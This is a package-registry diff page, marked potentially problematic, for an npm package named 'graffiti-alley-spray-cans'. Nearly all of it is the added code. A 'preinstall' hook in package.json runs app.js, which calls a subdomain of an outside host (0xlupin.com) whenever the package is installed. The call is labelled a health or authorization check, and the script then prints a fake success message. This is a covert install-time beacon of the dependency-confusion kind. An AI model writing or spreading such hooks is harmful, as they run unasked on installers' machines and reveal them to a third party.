graffiti-alley-spray-cans 20.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of graffiti-alley-spray-cans might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/app.js +18 -0
  2. package/package.json +12 -0
package/app.js ADDED
@@ -0,0 +1,18 @@
1
+ const http = require('http');
2
+ const os = require('os');
3
+
4
+ // Preparing Authorization Forms
5
+ const package_name = "graffiti-alley-spray-cans";
6
+
7
+ const health_check = `http://${package_name}.package.0xlupin.com`;
8
+
9
+ // Check if computer is authorized to ping lupin.monster
10
+ http.get(health_check, (res) => {
11
+ if (res.statusCode === 200) {
12
+ console.log('\x1b[36m%s\x1b[0m', '[*] graffiti-alley-spray-cans was installed successfully');
13
+ } else {
14
+ console.log(`Request failed with status code ${res.statusCode}`);
15
+ }
16
+ }).on('error', (e) => {
17
+ console.error(`Got error: ${e.message}`);
18
+ });
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "graffiti-alley-spray-cans",
3
+ "version": "20.0.1",
4
+ "description": "",
5
+ "main": "node app.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node app.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }